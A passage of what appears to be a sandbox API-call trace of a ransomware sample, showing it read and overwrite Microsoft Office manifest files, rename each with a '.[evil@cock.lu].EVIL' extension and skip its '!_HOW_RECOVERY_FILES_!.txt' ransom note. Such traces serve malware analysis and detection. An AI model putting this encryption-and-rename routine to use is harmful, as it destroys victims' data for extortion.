returned 1 [0099.677] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.678] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.678] __uncaught_exception () returned 0x84b1160800 [0099.678] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.678] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.678] ??_V@YAXPEAX@Z () returned 0x1 [0099.681] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.681] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.681] wcsstr (_Str="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.681] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 105 [0099.681] wcscmp (_String1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.681] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.681] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.681] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.683] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x3e019, lpOverlapped=0x0) returned 1 [0099.722] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.722] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.722] _errno () returned 0x84b1160840 [0099.723] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.723] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3e020, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x3e020, lpOverlapped=0x0) returned 1 [0099.723] CloseHandle (hObject=0x1a0) returned 1 [0099.723] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.724] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.724] __uncaught_exception () returned 0x84b1160800 [0099.724] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.724] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.725] ??_V@YAXPEAX@Z () returned 0x1 [0099.727] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.727] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.727] wcsstr (_Str="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.727] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 105 [0099.727] wcscmp (_String1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.727] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.727] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.729] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0099.735] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.735] _errno () returned 0x84b1160840 [0099.736] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.736] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0099.736] CloseHandle (hObject=0x1a0) returned 1 [0099.736] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.736] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.736] __uncaught_exception () returned 0x84b1160800 [0099.736] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.736] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.737] ??_V@YAXPEAX@Z () returned 0x1 [0099.739] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.740] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.740] wcsstr (_Str="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.740] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0099.740] wcscmp (_String1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.740] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.740] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.742] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x100000, lpOverlapped=0x0) returned 1 [0099.788] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.788] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.788] _errno () returned 0x84b1160840 [0099.789] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.790] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x100020, lpOverlapped=0x0) returned 1 [0099.796] CloseHandle (hObject=0x1a0) returned 1 [0099.796] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.797] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.797] __uncaught_exception () returned 0x84b1160800 [0099.797] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.797] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.797] ??_V@YAXPEAX@Z () returned 0x1 [0099.800] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.800] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.800] wcsstr (_Str="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.800] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 105 [0099.800] wcscmp (_String1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.800] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.801] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.802] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x4c78, lpOverlapped=0x0) returned 1 [0099.852] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.852] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.852] _errno () returned 0x84b1160840 [0099.852] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.852] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4c80, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x4c80, lpOverlapped=0x0) returned 1 [0099.852] CloseHandle (hObject=0x1a0) returned 1 [0099.852] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.853] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.853] __uncaught_exception () returned 0x84b1160800 [0099.853] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.853] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.854] ??_V@YAXPEAX@Z () returned 0x1 [0099.856] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.856] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.856] wcsstr (_Str="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.856] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 105 [0099.856] wcscmp (_String1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.856] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.856] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.858] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xc03db, lpOverlapped=0x0) returned 1 [0099.869] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.869] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.869] _errno () returned 0x84b1160840 [0099.870] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.870] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xc03e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xc03e0, lpOverlapped=0x0) returned 1 [0099.872] CloseHandle (hObject=0x1a0) returned 1 [0099.874] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.874] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.874] __uncaught_exception () returned 0x84b1160800 [0099.874] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.874] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.875] ??_V@YAXPEAX@Z () returned 0x1 [0099.879] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.879] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.879] wcsstr (_Str="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.879] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 105 [0099.879] wcscmp (_String1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.879] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.879] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.879] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.881] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0099.897] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.897] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.897] _errno () returned 0x84b1160840 [0099.897] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.897] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0099.898] CloseHandle (hObject=0x1a0) returned 1 [0099.898] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.898] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.898] __uncaught_exception () returned 0x84b1160800 [0099.898] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.898] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.899] ??_V@YAXPEAX@Z () returned 0x1 [0099.901] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.901] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.901] wcsstr (_Str="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.901] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 105 [0099.901] wcscmp (_String1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.902] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.902] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.903] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5b0, lpOverlapped=0x0) returned 1 [0099.910] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.910] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.910] _errno () returned 0x84b1160840 [0099.910] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.910] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5c0, lpOverlapped=0x0) returned 1 [0099.910] CloseHandle (hObject=0x1a0) returned 1 [0099.910] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.911] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.911] __uncaught_exception () returned 0x84b1160800 [0099.911] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.911] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.911] ??_V@YAXPEAX@Z () returned 0x1 [0099.914] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.914] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 